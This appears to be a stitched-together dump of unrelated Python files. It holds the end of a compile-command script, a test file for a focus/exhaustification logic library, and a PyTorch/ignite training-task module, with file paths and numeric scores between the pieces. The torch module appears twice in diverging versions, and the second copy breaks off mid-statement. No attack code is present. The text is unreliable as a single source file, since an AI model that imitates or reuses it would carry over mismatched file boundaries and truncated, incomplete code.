if len(target_directory) > 0:
change_dir_cmd = "cd " + target_directory + CMD_SEP
else:
# default working directory
target_directory = os.getcwd()
args.append(prog_name)
if len(compiler_args) > 0:
args.extend(list(compiler_args))
args.extend(DEFAULT_ARGS)
args.append(src_file)
print(str(args))
subprocess.check_call(args, cwd=target_directory)
# prepend the command to change the working directory.
if len(change_dir_cmd) > 0:
args = [change_dir_cmd] + args
f.write(" \\\n".join(args))
f.write("\n")
f.close()
return
if __name__ == '__main__':
parser = argparse.ArgumentParser("runner")
parser.add_argument("compile_commands", type=str)
parser.add_argument("prog_name", type=str)
args = parser.parse_args()
runMain(args) | tools/checked-c-convert/utils/convert-commands.py | 0.216342 | 0.083965 |
import sys
# insert at 1, 0 is the script path (or '' in REPL)
sys.path.insert(1, '../')
# %%
from exh import *
from exh.exts.focus import *
# %%
"""
# Construction and evaluation
"""
f = Focus(a | b, [b])
assignment = np.array([
[True, True],
[True, False],
[False, True],
[False, False]
])
assert((f.evaluate_aux(
vm = f.vars(),
assignment = assignment,
variables = {}
) ==
(a | b).evaluate_aux(
vm = f.vars(),
assignment = assignment,
variables = {}
)).all()
)
assert(not (f.evaluate_aux(
vm = f.vars(),
assignment = assignment,
variables = {}
) ==
(a & b).evaluate_aux(
vm = f.vars(),
assignment = assignment,
variables = {}
)).all()
)
# %%
"""
# Alternative calculation
"""
scale = FocusScales()
assert(
scale.alternatives_to([f])
== [b]
)
assert(
scale.alternatives_to([f])
!= [a | b]
)
# %%
"""
# Exhaustification
## Simple cases
"""
# Test if FocusScales is now default (importing the extension should make it default)
assert(any(isinstance(s, FocusScales) for s in Exh(a).e.scales.scales))
# %%
g = Focus(a, alts = [b, c])
exhg = Exh(g, scales = FocusScales())
assert(
exhg.alts == [
g,
b,
c
]
)
universe = Universe(f = exhg)
assert(universe.equivalent(exhg, a & ~b & ~c))
# %%
g = Focus(a | b, alts = [a & b])
exhg = Exh(g, scales = FocusScales())
assert(
exhg.alts == [
g,
Focus(a, alts=[a & b]),
Focus(b, alts=[a & b]),
a & b
]
)
universe = Universe(f = exhg)
assert(universe.equivalent(exhg, (a | b) & ~(a & b)))
# %%
"""
## Exhaustification across operators
"""
apple = Pred(name = "A", depends = ["x"])
cantaloupe = Pred(name = "C", depends = ["x"])
h = Ex > Focus(apple, alts = [cantaloupe])
exhh = Exh(h, scales = FocusScales())
complex_universe = Universe(f = h)
assert(complex_universe.equivalent(
exhh,
(Ex > apple) & ~(Ex > cantaloupe)
))
assert(not complex_universe.equivalent(
exhh,
Ex > apple
))
# %%
"""
Not A
"""
prop_universe = Universe(fs = [a, b, c])
exhf = Exh(~Focus(a, alts = [c]), scales = FocusScales(), subst = False)
assert(exhf.alts == [~Focus(a, alts = [c]), ~c])
assert(prop_universe.equivalent(
exhf,
~a & c
))
# %%
"""
Recursive exh
"""
prej = Focus(a, alts = [c])
fst_exh = Exh(prej, scales = FocusScales())
snd_exh = Exh(fst_exh, scales = FocusScales())
assert(
fst_exh.alts ==
[prej, c]
)
assert(
snd_exh.alts ==
[Exh(prej), Exh(c)]
)
assert(prop_universe.equivalent(
snd_exh,
a & ~c
))
# %% | tests/focus.py | 0.286568 | 0.565839 |
__all__ = [
'DataLoaderTask',
'SimpleDataLoaderTask',
'TrainTask',
'SimpleTrainTask'
]
from abc import abstractmethod
from copy import deepcopy
from logging import Logger
from typing import List, Text, Tuple, Dict, Any
from ..mixin import value
from ..storages.basic import Storage
from ..tasks.containers import Task
from ..typedef import Definition, Profile
from ..typedef import Return
try:
import torch
from torch import nn
from torch import optim
from torch.utils import data
from ignite import engine
from ignite import metrics
from ignite.utils import convert_tensor
except ImportError as ie:
raise RuntimeError('Tasks in module tasker.contrib.torch need the pytorch and pytorch-ignite packages') from ie
class DataLoaderTask(Task):
"""
<i>tasker.contrib.torch.DataLoaderTask</i>
The fundamental task construction to provide data loaders.
Please declare the prefix of the data loader key in shared storage via the
reference field of the meta definitions.
Examples:
```toml
# Data loader of validation.
[[__meta__]]
reference = "cifar_loader.CIFARDataLoaderTask:validate"
include = false
path = ""
profile = "validate_loader"
execute = true
# Data Loader of training.
[[__meta__]]
reference = "conv_train.ConvTrainTask:train"
include = false
path = ""
profile = "train"
execute = true
```
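The suffix after the colon in ``reference`` (``:validate`` above) appears to be forwarded to the
constructor as ``_type``, so the first loader is published to shared storage as ``validate_loader``,
while a task referenced without a suffix publishes the plain ``loader`` key.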
"""
def __init__(self, _type: Text = None):
if _type is None:
self.PROVIDE_KEY = 'loader'
else:
self.PROVIDE_KEY = f'{_type}_loader'
def invoke(self, profile: Profile, shared: Storage, logger: Logger) -> int:
dataset = self.create_dataset(profile.dataset, shared, logger)
assert isinstance(dataset, data.Dataset)
loader_params = dict(profile.loader)
loader_params['dataset'] = dataset
assert profile.sampler_type in ('sampler', 'batch_sampler', 'none')
if profile.sampler_type != 'none':
loader_params[profile.sampler_type] = self.create_sampler(
dataset, profile.sampler_type == 'batch_sampler', profile.loader,
shared, logger
)
if profile.sampler_type == 'batch_sampler':
if 'batch_size' in loader_params:
loader_params.pop('batch_size')
if 'shuffle' in loader_params:
loader_params.pop('shuffle')
if 'sampler' in loader_params:
loader_params.pop('sampler')
if 'drop_last' in loader_params:
loader_params.pop('drop_last')
shared[self.PROVIDE_KEY] = data.DataLoader(**loader_params)
return Return.SUCCESS.value
def require(self) -> List[Text]:
return []
def provide(self) -> List[Text]:
return [self.PROVIDE_KEY]
def remove(self) -> List[Text]:
return []
@classmethod
def define(cls) -> List[Definition]:
"""
```toml
__schema__ = "tasker.contrib.torch.DataLoaderTask"
sampler_type = ""
[loader]
batch_size = 0
shuffle = true
num_workers = 0
pin_memory = true
drop_last = true
```
"""
return [
value('dataset', list, cls.define_dataset()),
value('loader', list, [
value('batch_size', int),
value('shuffle', bool),
value('num_workers', int),
value('pin_memory', bool),
value('drop_last', bool),
]),
value('sampler_type', str),
value('sampler', list, cls.define_sampler())
]
@abstractmethod
def create_dataset(self, profile: Profile, shared: Storage, logger: Logger) -> data.Dataset:
"""
The function to create dataset instance with defined profile.
Args:
profile: Runtime profile defined in TOML file of dataset.
shared: Shared storage in the whole lifecycle.
logger: The logger named with this Task.
Returns:
A new dataset instance.
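Examples:
A minimal sketch of an override (the tensors are purely illustrative; a real
implementation would normally build the dataset from ``profile``):
```python
def create_dataset(self, profile, shared, logger):
    import torch
    from torch.utils import data
    xs = torch.randn(8, 3)                      # illustrative features
    ys = torch.zeros(8, dtype=torch.long)       # illustrative labels
    return data.TensorDataset(xs, ys)
```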
"""
raise NotImplementedError('Please create the dataset in create_dataset')
@classmethod
@abstractmethod
def define_dataset(cls):
"""
A profile template for the dataset; it needs to be implemented by the user.
Returns:
Definition of dataset profile.
"""
raise NotImplementedError('Please define the dataset profile in define_dataset')
@abstractmethod
def create_sampler(self, dataset: data.Dataset, batch_sampler: bool, profile: Profile, shared: Storage,
logger: Logger):
"""
The function to create sampler instance with defined profile.
Args:
dataset: The dataset instance need to be loaded.
batch_sampler: Whether to use batch_sampler.
profile: Runtime profile defined in TOML file of sampler or batch sampler.
shared: Shared storage in the whole lifecycle.
logger: The logger named with this Task.
Returns:
A new sampler or batch sampler instance.
"""
if batch_sampler:
raise NotImplementedError('Please create the batch sampler in create_sampler')
else:
raise NotImplementedError('Please create the sampler in create_sampler')
@classmethod
@abstractmethod
def define_sampler(cls):
raise NotImplementedError('Please define the sampler or batch sampler profile in define_sampler')
class SimpleDataLoaderTask(DataLoaderTask):
"""
<i>tasker.contrib.torch.SimpleDataLoaderTask</i>
An easy-to-use base class of task for providing a data loader. You can
create a data loader with only a dataset reference and the related profile.
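Examples:
A rough profile sketch (the dataset reference and kwargs are illustrative; the exact
nesting depends on how your profile file is parsed):
```toml
sampler_type = "none"
[dataset]
reference = "torchvision.datasets.CIFAR10"
[dataset.kwargs]
root = "./data"
train = true
download = true
[loader]
batch_size = 64
shuffle = true
num_workers = 2
pin_memory = true
drop_last = false
```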
"""
def create_dataset(self, profile: Profile, shared: Storage, logger: Logger) -> data.Dataset:
dataset_cls = profile.reference
return dataset_cls(**profile.kwargs)
@classmethod
def define_dataset(cls):
return [
value('reference', str),
value('kwargs', list, [])
]
def create_sampler(self, dataset: data.Dataset, batch_sampler: bool, profile: Profile, shared: Storage,
logger: Logger):
return None
@classmethod
def define_sampler(cls):
return []
class TrainTask(Task):
"""
<i>tasker.contrib.torch.TrainTask</i>
The fundamental task construction to train a model by
provided data loaders.
Before this task, you need to run tasks that provide two data loaders named
"train_loader" and "validate_loader" in shared storage. The trained model
will be stored under the "\\<something\\>_model" or "model" label in shared
storage.
However, many actions must be redefined by the user when
implementing `TrainTask`. You can also implement [SimpleTrainTask][tasker.contrib.torch.SimpleTrainTask]
to boost your development.
If you want to store the model with a prefix, please fill the
prefix name into the first parameter when referencing it.
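For example, referencing ``conv_train.ConvTrainTask:best`` (assuming the suffix after the colon
is forwarded to the constructor) stores the trained model under ``best_model``, while a reference
without a suffix stores it under ``model``.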
"""
def __init__(self, *args, **kwargs):
if len(args) >= 1:
self.prefix = args[0]
else:
self.prefix = None
def invoke(self, profile: Profile, shared: Storage, logger: Logger) -> int:
torch.manual_seed(profile.seed if 'seed' in profile else 0x3a4e)
if 'model' in profile:
device = profile.device if 'device' in profile else 'cpu'
model = self.create_model(profile.model, shared, logger).to(device)
else:
raise RuntimeError('Missing profile field "model" to define the model.')
if 'train_loader' in shared:
train_loader: torch.utils.data.DataLoader = shared['train_loader']
else:
raise RuntimeError('Missing shared object "train_loader" to provide training sets.')
if 'validate_loader' in shared:
validate_loader: torch.utils.data.DataLoader = shared['validate_loader']
else:
raise RuntimeError('Missing shared object "validate_loader" to provide validating sets.')
if 'optimizer' in profile:
optimizer, lr_scheduler = self.create_optimizer(profile.optimizer, shared, logger, model)
else:
raise RuntimeError('Missing profile field "optimizer" to define the optimizer.')
if 'loss_function' in profile:
loss_function = self.create_loss_function(profile.loss_function, shared, logger)
else:
raise RuntimeError('Missing profile field "loss_function" to define the loss function.')
trainer = self.create_trainer(
profile, shared, logger, model, loss_function, optimizer, lr_scheduler,
profile.train_output_transform if 'train_output_transform' in profile else lambda x, y, y_pred,
loss: loss.item()
)
evaluator = self.create_evaluator(
profile, shared, logger, model, loss_function, optimizer, lr_scheduler,
profile.evaluate_output_transform if 'evaluate_output_transform' in profile else lambda x, y, y_pred: (
y_pred, y)
)
context = {}
@evaluator.on(engine.Events.COMPLETED)
def display_metrics(_engine: engine.Engine):
logger.info('EVALUATE EPOCH {} | {}'.format(trainer.state.epoch, ' | '.join(map(
lambda it: '{}: {}'.format(it[0], repr(it[1]).replace('\n', ' ')),
_engine.state.metrics.items(),
))))
@evaluator.on(engine.Events.COMPLETED)
def store_model(_engine: engine.Engine):
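# Keep the best model seen so far. "compare_by" names the metric used for comparison; an optional
# leading "+" or "-" selects maximization or minimization, and the default is to minimize the loss.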
if 'compare_metric' not in context:
context['compare_metric'] = float('-inf')
if 'compare_by' not in profile or len(profile.compare_by) == 0:
compare_by = 'loss'
sign = '-'
else:
compare_by = profile.compare_by
if compare_by[0] in '+-':
sign = compare_by[0]
compare_by = compare_by[1:]
else:
sign = '+'
if compare_by not in _engine.state.metrics:
logger.warning(f'Not found "{compare_by}" in metrics. Fall back to loss.')
compare_by = 'loss'
sign = '-'
metric_value = _engine.state.metrics[compare_by]
if sign == '-':
metric_value = -metric_value
if metric_value > context['compare_metric']:
context['compare_metric'] = metric_value
shared[self._model_key] = deepcopy(model.eval())
logger.info(f'Stored the model with {compare_by} of {metric_value}.')
@trainer.on(engine.Events.ITERATION_COMPLETED(
every=int(len(train_loader) * (profile.loss_display if 'loss_display' in profile else 0.1))
))
def display_loss(_engine: engine.Engine):
epoch_iteration = _engine.state.iteration % _engine.state.epoch_length
if epoch_iteration == 0:
epoch_iteration = _engine.state.epoch_length
logger.info('TRAIN EPOCH {} ITERATION {} | output: {}'.format(
_engine.state.epoch, epoch_iteration, _engine.state.output
))
@trainer.on(engine.Events.EPOCH_COMPLETED)
def evaluate(_engine: engine.Engine):
evaluator.run(
validate_loader,
)
self.register_handlers(profile, shared, logger, model, trainer, evaluator, context)
trainer.run(
train_loader,
max_epochs=profile.max_epochs if 'max_epochs' in profile else 100,
)
return Return.SUCCESS.value
@property
def _model_key(self):
return 'model' if self.prefix is None else f'{self.prefix}_model'
def require(self) -> List[Text]:
"""
The task requires 2 items, including "train_loader" and "validate_loader".
Returns:
"train_loader" and "validate_loader"
"""
return [
'train_loader',
'validate_loader',
]
def provide(self) -> List[Text]:
"""
The task provides 1 item, including "model" or "\\<something\\>_model".
Returns:
"model" or "\\<something\\>_model"
"""
return [
self._model_key
]
def remove(self) -> List[Text]:
"""
This task removes nothing.
Returns:
nothing
"""
return []
@classmethod
def define(cls) -> List[Definition]:
"""
Define the schema of `TrainTask`.
Returns:
Schema of `TrainTask`.
Examples:
See Also [Train AlexNet on Place 365 dataset](https://github.com/chenrz925/waterch-tasker/blob/master/examples/place365_alexnet.toml)
"""
return [
value('model', list, [
value('reference', str),
value('kwargs', list, [])
]),
value('loss_function', list, [
value('reference', str),
value('kwargs', list, [])
]),
value('metrics', list, []),
value('optimizer', list, [
value('reference', str),
value('kwargs', list, []),
value('lr_scheduler', list, [
value('reference', str),
value('kwargs', list)
])
])
]
@abstractmethod
def create_model(self, profile: Profile, shared: Storage, logger: Logger, **kwargs) -> nn.Module:
"""
Implement `create_model` to build the PyTorch model.
Args:
profile: Runtime profile defined in TOML file.
shared: Shared storage in the whole lifecycle.
logger: The logger named with this Task.
Returns:
A new model instance.
Notes:
The profile should be attribute "model" in the task profile.
"""
raise NotImplementedError('Please create the model in create_model')
@abstractmethod
def create_loss_function(self, profile: Profile, shared: Storage, logger: Logger, **kwargs) -> nn.Module:
"""
Implement `create_loss_function` to build the PyTorch loss function.
Args:
profile: Runtime profile defined in TOML file.
shared: Shared storage in the whole lifecycle.
logger: The logger named with this Task.
Returns:
A new loss function instance.
Notes:
The profile should be attribute "loss_function" in the task profile.
"""
raise NotImplementedError('Please create the loss function in create_loss_function')
@abstractmethod
def create_optimizer(self, profile: Profile, shared: Storage, logger: Logger, model: nn.Module,
**kwargs) -> Tuple[optim.Optimizer, Any]:
"""
Implement `create_optimizer` to build the PyTorch optimizer.
Args:
profile: Runtime profile defined in TOML file.
shared: Shared storage in the whole lifecycle.
logger: The logger named with this Task.
Returns:
A tuple of a new optimizer instance and an optional learning-rate scheduler (or None).
Notes:
The profile should be attribute "optimizer" in the task profile.
"""
raise NotImplementedError('Please create the optimizer in create_optimizer')
def prepare_train_batch(
self, profile: Profile, shared: Storage, logger: Logger,
batch: Tuple[torch.Tensor], device: Text, non_blocking: bool = False
):
"""
Preparing batch of samples when training. Implement this function to
customize.
Args:
profile: Runtime profile defined in TOML file.
shared: Shared storage in the whole lifecycle.
logger: The logger named with this Task.
batch: Raw batch provided by the data loader.
device: The device to move the batch to.
non_blocking: Whether to move the batch to the device asynchronously (non-blocking).
Returns:
Prepared batch.
"""
x, y = batch
return (
convert_tensor(x, device=torch.device(device), non_blocking=non_blocking),
convert_tensor(y, device=torch.device(device), non_blocking=non_blocking),
)
def prepare_validate_batch(
self, profile: Profile, shared: Storage, logger: Logger,
batch: Tuple[torch.Tensor], device: Text, non_blocking: bool = False
):
"""
Preparing batch of samples when validating. Implement this function to
customize.
Args:
profile: Runtime profile defined in TOML file.
shared: Shared storage in the whole lifecycle.
logger: The logger named with this Task.
batch: Raw batch provided by the data loader.
device: The device to move the batch to.
non_blocking: Whether to move the batch to the device asynchronously (non-blocking).
Returns:
Prepared batch.
"""
x, y = batch
return (
convert_tensor(x, device=torch.device(device), non_blocking=non_blocking),
convert_tensor(y, device=torch.device(device), non_blocking=non_blocking),
)
def create_trainer(
self, profile: Profile, shared: Storage, logger: Logger,
model: nn.Module, loss_function: nn.Module, optimizer: optim.Optimizer, lr_scheduler: Any,
output_transform=lambda x, y, y_pred, loss: loss.item(),
**kwargs
) -> engine.Engine:
"""
Build the trainer engine. Re-implement this function when you
want to customize the updating actions of training.
Args:
profile: Runtime profile defined in TOML file.
shared: Shared storage in the whole lifecycle.
logger: The logger named with this Task.
model: The model to train.
loss_function: The loss function to train.
optimizer: The optimizer to train.
lr_scheduler: The scheduler to control the learning rate.
output_transform: The action to transform the output of the model.
Returns:
The trainer engine.
"""
if 'device' in profile:
device_type = profile.device
else:
device_type = 'cpu'
if 'non_blocking' in profile:
non_blocking = profile.non_blocking
else:
non_blocking = False
if 'deterministic' in profile:
deterministic = profile.deterministic
else:
deterministic = False
def _update(_engine: engine.Engine, _batch: Tuple[torch.Tensor]):
model.train()
optimizer.zero_grad()
x, y = self.prepare_train_batch(profile, shared, logger, _batch, device=device_type,
non_blocking=non_blocking)
y_pred = model(x)
loss = loss_function(y_pred, y)
loss.backward()
optimizer.step()
if lr_scheduler is not None:
lr_scheduler.step(loss)
return output_transform(x, y, y_pred, loss)
trainer = engine.Engine(_update) if not deterministic else engine.DeterministicEngine(_update)
return trainer
def register_metrics(
self, profile: Profile, shared: Storage, logger: Logger,
_metrics: Dict
):
"""
Register the metric methods.
Args:
profile: Runtime profile defined in TOML file.
shared: Shared storage in the whole lifecycle.
logger: The logger named with this Task.
_metrics: The metrics dictionary to register.
Returns:
The metrics dictionary.
"""
return _metrics
def register_handlers(self, profile, shared, logger, model, trainer, evaluator, context):
"""
Args:
profile: Runtime profile defined in TOML file.
shared: Shared storage in the whole lifecycle.
logger: The logger named with this Task.
model: The model to train.
trainer: The trainer of the model.
evaluator: The evaluator of the model.
context: The context dictionary to store states in handlers.
Returns:
Nothing.
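Examples:
A minimal sketch of an override (the logging handler is purely illustrative):
```python
def register_handlers(self, profile, shared, logger, model, trainer, evaluator, context):
    from ignite.engine import Events

    @trainer.on(Events.EPOCH_COMPLETED)
    def log_epoch(_engine):
        logger.info(f'Finished epoch {_engine.state.epoch}')
```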
"""
pass
def create_evaluator(
self, profile: Profile, shared: Storage, logger: Logger,
model: nn.Module, loss_function: nn.Module, optimizer: optim.Optimizer, lr_scheduler: Any,
output_transform=lambda x, y, y_pred: (y_pred, y),
**kwargs
) -> engine.Engine:
"""
Args:
profile: Runtime profile defined in TOML file.
shared: Shared storage in the whole lifecycle.
logger: The logger named with this Task.
model: The model to train.
loss_function: The loss function to train.
optimizer: The optimizer to train.
lr_scheduler: The scheduler to control the learning rate.
output_transform: The action to transform the output of the model.
Returns:
The evaluator engine.
"""
if 'device' in profile:
device_type = profile.device
else:
device_type = 'cpu'
if 'non_blocking' in profile:
non_blocking = profile.non_blocking
else:
non_blocking = False
if 'deterministic' in profile:
deterministic = profile.deterministic
else:
deterministic = False
_metrics = {}
self.register_metrics(profile, shared, logger, _metrics)
def _inference(_engine: engine.Engine, _batch: Tuple[torch.Tensor]):
model.eval()
with torch.no_grad():
x, y = self.prepare_validate_batch(profile, shared, logger, _batch, device=device_type,
non_blocking=non_blocking)
y_pred = model(x)
return output_transform(x, y, y_pred)
evaluator = engine.DeterministicEngine(_inference) if deterministic else engine.Engine(_inference)
for name, metric in _metrics.items():
metric.attach(evaluator, name)
return evaluator
class SimpleTrainTask(TrainTask):
"""
<i>tasker.contrib.torch.SimpleTrainTask</i>
An easy-to-use base class of task for training a model. You can
train a model with only class references and the related profile.
Examples:
See Also [Train AlexNet on Place 365 dataset](https://github.com/chenrz925/waterch-tasker/blob/master/examples/place365_alexnet.toml)
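A rough profile sketch (class references, hyper-parameters, and the metric expression are
illustrative placeholders):
```toml
max_epochs = 30
device = "cuda:0"
compare_by = "+accuracy"
[model]
reference = "torchvision.models.alexnet"
[model.kwargs]
num_classes = 365
[loss_function]
reference = "torch.nn.CrossEntropyLoss"
[optimizer]
reference = "torch.optim.SGD"
[optimizer.kwargs]
lr = 0.01
momentum = 0.9
[metrics]
accuracy = "$M$ignite.metrics.Accuracy"
```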
"""
def create_model(self, profile: Profile, shared: Storage, logger: Logger, **kwargs) -> nn.Module:
"""
You can build the model class implementing [`Module`](https://pytorch.org/docs/stable/generated/torch.nn.Module.html#torch.nn.Module).
And the parameters of the model class can be passed by `kwargs`.
Args:
profile: Runtime profile defined in TOML file.
shared: Shared storage in the whole lifecycle.
logger: The logger named with this Task.
Returns:
New model instance.
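Examples:
An illustrative ``model`` section of the task profile (reference and kwargs are placeholders):
```toml
[model]
reference = "torchvision.models.resnet18"
[model.kwargs]
num_classes = 10
```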
"""
if 'reference' in profile:
clz = profile.reference
try:
if not issubclass(clz, nn.Module):
logger.warning('Referenced class is not a subclass of torch.nn.Module.')
except TypeError:
logger.warning('Referenced object is not a class, maybe a function?')
else:
raise RuntimeError('Missing field "reference" in the model profile.')
if 'kwargs' in profile:
kwargs = profile.kwargs
else:
kwargs = {}
model = clz(**kwargs)
return model
def create_loss_function(self, profile: Profile, shared: Storage, logger: Logger, **kwargs) -> nn.Module:
"""
You can build the loss function class implementing [`Module`](https://pytorch.org/docs/stable/generated/torch.nn.Module.html#torch.nn.Module).
And the parameters of the loss function class can be passed by `kwargs`.
All loss functions provided PyTorch officially can be referenced.
Args:
profile: Runtime profile defined in TOML file.
shared: Shared storage in the whole lifecycle.
logger: The logger named with this Task.
Returns:
New loss function instance.
"""
if 'reference' in profile:
clz = profile.reference
try:
if not issubclass(clz, nn.Module):
logger.warning('Referenced class is not a subclass of torch.nn.Module.')
except TypeError:
logger.warning('Referenced object is not a class, maybe a function?')
else:
raise RuntimeError('Missing field "reference" in the loss_function profile.')
if 'kwargs' in profile:
kwargs = profile.kwargs
else:
kwargs = {}
loss_function = clz(**kwargs)
return loss_function
def create_optimizer(self, profile: Profile, shared: Storage, logger: Logger, model: nn.Module, **kwargs) -> Tuple[
optim.Optimizer, Any]:
"""
You can build the optimizer class implementing [`Optimizer`](https://pytorch.org/docs/stable/optim.html#torch.optim.Optimizer).
And the parameters of the optimizer class can be passed by `kwargs`.
All optimizers provided PyTorch officially can be referenced.
You can also build a learning rate scheduler through `lr_scheduler` field.
Args:
profile: Runtime profile defined in TOML file.
shared: Shared storage in the whole lifecycle.
logger: The logger named with this Task.
model: The model to train.
Returns:
New optimizer instance.
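Examples:
An illustrative ``optimizer`` section with an optional learning-rate scheduler
(references and kwargs are placeholders; the scheduler is read from an
``lr_scheduler`` sub-table):
```toml
[optimizer]
reference = "torch.optim.Adam"
[optimizer.kwargs]
lr = 0.001
[optimizer.lr_scheduler]
reference = "torch.optim.lr_scheduler.ReduceLROnPlateau"
[optimizer.lr_scheduler.kwargs]
patience = 3
```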
"""
if 'reference' in profile:
clz = profile.reference
try:
if not issubclass(clz, optim.Optimizer):
logger.warning('Referenced class is not a subclass of torch.optim.Optimizer.')
except TypeError:
logger.warning('Referenced object is not a class, maybe a function?')
else:
raise RuntimeError('Missing field "reference" in the optimizer profile.')
if 'kwargs' in profile:
kwargs = profile.kwargs
else:
kwargs = {}
optimizer = clz(model.parameters(), **kwargs)
if 'lr_scheduler' in profile:
if 'reference' in profile.lr_scheduler:
lr_scheduler_clz = profile.lr_scheduler.reference
if 'kwargs' in profile.lr_scheduler:
lr_scheduler_kwargs = profile.lr_scheduler.kwargs
else:
lr_scheduler_kwargs = {}
lr_scheduler = lr_scheduler_clz(optimizer, **lr_scheduler_kwargs)
else:
lr_scheduler = None
else:
lr_scheduler = None
return optimizer, lr_scheduler
def register_metrics(
self, profile: Profile, shared: Storage, logger: Logger,
_metrics: Dict
):
"""
Register the metric methods. In `SimpleTrainTask`,
all the metrics can be initialized in profile by
"M" type field.
Examples:
Register accuracy as metric method.
```toml
accuracy = '$M$ignite.metrics.Accuracy'
```
Register F1 macro as metric method.
```toml
f1macro = '1$M$tasker.contrib.torch.FBetaMacro$I'
```
Args:
profile: Runtime profile defined in TOML file.
shared: Shared storage in the whole lifecycle.
logger: The logger named with this Task.
_metrics: The metrics dictionary to register.
Returns:
The metrics dictionary.
"""
_metrics['loss'] = metrics.Loss(self.create_loss_function(profile.loss_function, shared, logger))
if 'metrics' in profile:
_metrics.update(profile.metrics)
return _metrics | src/tasker/contrib/torch.py | __all__ = [
'DataLoaderTask',
'SimpleDataLoaderTask',
'TrainTask',
'SimpleTrainTask'
]
from abc import abstractmethod
from copy import deepcopy
from logging import Logger
from typing import List, Text, Tuple, Dict, Any
from ..mixin import value
from ..storages.basic import Storage
from ..tasks.containers import Task
from ..typedef import Definition, Profile
from ..typedef import Return
try:
import torch
from torch import nn
from torch import optim
from torch.utils import data
from ignite import engine
from ignite import metrics
from ignite.utils import convert_tensor
except ImportError as ie:
raise RuntimeError('Tasks in module tasker.contrib.torch needs pytorch and pytorch-ignite modules')
class DataLoaderTask(Task):
"""
<i>tasker.contrib.torch.DataLoaderTask</i>
The fundamental task construction to provide data loaders.
Please declare the prefix of data loader in shared storage in reference
field of meta definitions.
Examples:
```toml
# Data loader of validation.
[[__meta__]]
reference = "cifar_loader.CIFARDataLoaderTask:validate"
include = false
path = ""
profile = "validate_loader"
execute = true
# Data Loader of training.
[[__meta__]]
reference = "conv_train.ConvTrainTask:train"
include = false
path = ""
profile = "train"
execute = true
```
"""
def __init__(self, _type: Text = None):
if _type is None:
self.PROVIDE_KEY = 'loader'
else:
self.PROVIDE_KEY = f'{_type}_loader'
def invoke(self, profile: Profile, shared: Storage, logger: Logger) -> int:
dataset = self.create_dataset(profile.dataset, shared, logger)
assert isinstance(dataset, data.Dataset)
loader_params = dict(profile.loader)
loader_params['dataset'] = dataset
assert profile.sampler_type in ('sampler', 'batch_sampler', 'none')
if profile.sampler_type != 'none':
loader_params[profile.sampler_type] = self.create_sampler(
dataset, profile.sampler_type == 'batch_sampler', profile.loader,
shared, logger
)
if profile.sampler_type == 'batch_sampler':
if 'batch_size' in loader_params:
loader_params.pop('batch_size')
if 'shuffle' in loader_params:
loader_params.pop('shuffle')
if 'sampler' in loader_params:
loader_params.pop('sampler')
if 'drop_last' in loader_params:
loader_params.pop('drop_last')
shared[self.PROVIDE_KEY] = data.DataLoader(**loader_params)
return Return.SUCCESS.value
def require(self) -> List[Text]:
return []
def provide(self) -> List[Text]:
return [self.PROVIDE_KEY]
def remove(self) -> List[Text]:
return []
@classmethod
def define(cls) -> List[Definition]:
"""
```toml
__schema__ = "tasker.contrib.torch.DataLoaderTask"
sampler_type = ""
[loader]
batch_size = 0
shuffle = true
num_workers = 0
pin_memory = true
drop_last = true
```
"""
return [
value('dataset', list, cls.define_dataset()),
value('loader', list, [
value('batch_size', int),
value('shuffle', bool),
value('num_workers', int),
value('pin_memory', bool),
value('drop_last', bool),
]),
value('sampler_type', str),
value('sampler', list, cls.define_sampler())
]
@abstractmethod
def create_dataset(self, profile: Profile, shared: Storage, logger: Logger) -> data.Dataset:
"""
The function to create dataset instance with defined profile.
Args:
profile: Runtime profile defined in TOML file of dataset.
shared: Shared storage in the whole lifecycle.
logger: The logger named with this Task.
Returns:
A new dataset instance.
"""
raise NotImplementedError('Please create the dataset in create_dataset')
@classmethod
@abstractmethod
def define_dataset(cls):
"""
A profile template for the dataset; it needs to be implemented by the user.
Returns:
Definition of dataset profile.
"""
raise NotImplementedError('Please define the dataset profile in define_dataset')
@abstractmethod
def create_sampler(self, dataset: data.Dataset, batch_sampler: bool, profile: Profile, shared: Storage,
logger: Logger):
"""
The function to create sampler instance with defined profile.
Args:
dataset: The dataset instance need to be loaded.
batch_sampler: Whether to use batch_sampler.
profile: Runtime profile defined in TOML file of sampler or batch sampler.
shared: Shared storage in the whole lifecycle.
logger: The logger named with this Task.
Returns:
A new sampler or batch sampler instance.
"""
if batch_sampler:
raise NotImplementedError('Please create the batch sampler in create_sampler')
else:
raise NotImplementedError('Please create the sampler in create_sampler')
@classmethod
@abstractmethod
def define_sampler(cls):
raise NotImplementedError('Please define the sampler or batch sampler profile in define_sampler')
class SimpleDataLoaderTask(DataLoaderTask):
"""
<i>tasker.contrib.torch.SimpleDataLoaderTask</i>
An easy to use base class of task for providing data loader. You can
create data loader only with reference of dataset and related profile.
"""
def create_dataset(self, profile: Profile, shared: Storage, logger: Logger) -> data.Dataset:
dataset_cls = profile.reference
return dataset_cls(**profile.kwargs)
@classmethod
def define_dataset(cls):
return [
value('reference', str),
value('kwargs', list, [])
]
def create_sampler(self, dataset: data.Dataset, batch_sampler: bool, profile: Profile, shared: Storage,
logger: Logger):
return None
@classmethod
def define_sampler(cls):
return []
class TrainTask(Task):
"""
<i>tasker.contrib.torch.TrainTask</i>
The fundamental task construction to train a model by
provided data loaders.
You need to run a task providing two data loaders named
"train_loader" and "validate_loader" in shared storage
before this task as well as the trained model will be
stored into "\\<something\\>_model" or "model" label in shared
storage.
However, many actions should be redefined by user when
implementing `TrainTask`. You can also implement [SimpleTrainTask][tasker.contrib.torch.SimpleTrainTask]
to boost your development.
If you want to store the model with a prefix, please fill the
prefix name into the first parameter when referencing it.
"""
def __init__(self, *args, **kwargs):
if len(args) >= 1:
self.prefix = args[0]
else:
self.prefix = None
def invoke(self, profile: Profile, shared: Storage, logger: Logger) -> int:
torch.manual_seed(profile.seed if 'seed' in profile else 0x3a4e)
if 'model' in profile:
device = profile.device if 'device' in profile else 'cpu'
model = self.create_model(profile.model, shared, logger).to(device)
else:
raise RuntimeError('Missing profile field "model" to define the model.')
if 'train_loader' in shared:
train_loader: torch.utils.data.DataLoader = shared['train_loader']
else:
raise RuntimeError('Missing shared object "train_loader" to provide training sets.')
if 'validate_loader' in shared:
validate_loader: torch.utils.data.DataLoader = shared['validate_loader']
else:
raise RuntimeError('Missing shared object "validate_loader" to provide validating sets.')
if 'optimizer' in profile:
optimizer, lr_scheduler = self.create_optimizer(profile.optimizer, shared, logger, model)
else:
raise RuntimeError('Missing profile field "optimizer" to define the optimizer.')
if 'loss_function' in profile:
loss_function = self.create_loss_function(profile.loss_function, shared, logger)
else:
